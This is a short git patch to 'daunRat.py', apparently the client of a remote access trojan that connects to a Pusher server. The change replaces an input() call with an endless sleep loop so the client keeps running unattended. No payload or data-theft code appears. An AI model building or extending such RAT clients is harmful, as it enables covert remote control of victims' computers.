From 3d1ddbeb9f6c9b769752fee4ba633eb99a9d2e67 Mon Sep 17 00:00:00 2001 From: BarsTiger Date: Sun, 29 May 2022 22:28:23 +0300 Subject: [PATCH] removed input, while true with sleep is back --- client/daunRat.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/client/daunRat.py b/client/daunRat.py index 7baad21..cb99b10 100644 --- a/client/daunRat.py +++ b/client/daunRat.py @@ -6,6 +6,7 @@ from contextlib import redirect_stdout import subprocess import sys import os +import time sys.path.append('daun/modules') import daun.modules as daun # needed to use daun functionality from admin from modules.selfutil import daunrat # needed to use self utility functions @@ -84,4 +85,6 @@ if __name__ == '__main__': print("daunRat by ANONYMUSSSS") receiver.connection.bind('pusher:connection_established', handle_connection_to_server) receiver.connect() - input() + while True: + time.sleep(3600) + print("daun rat is still running")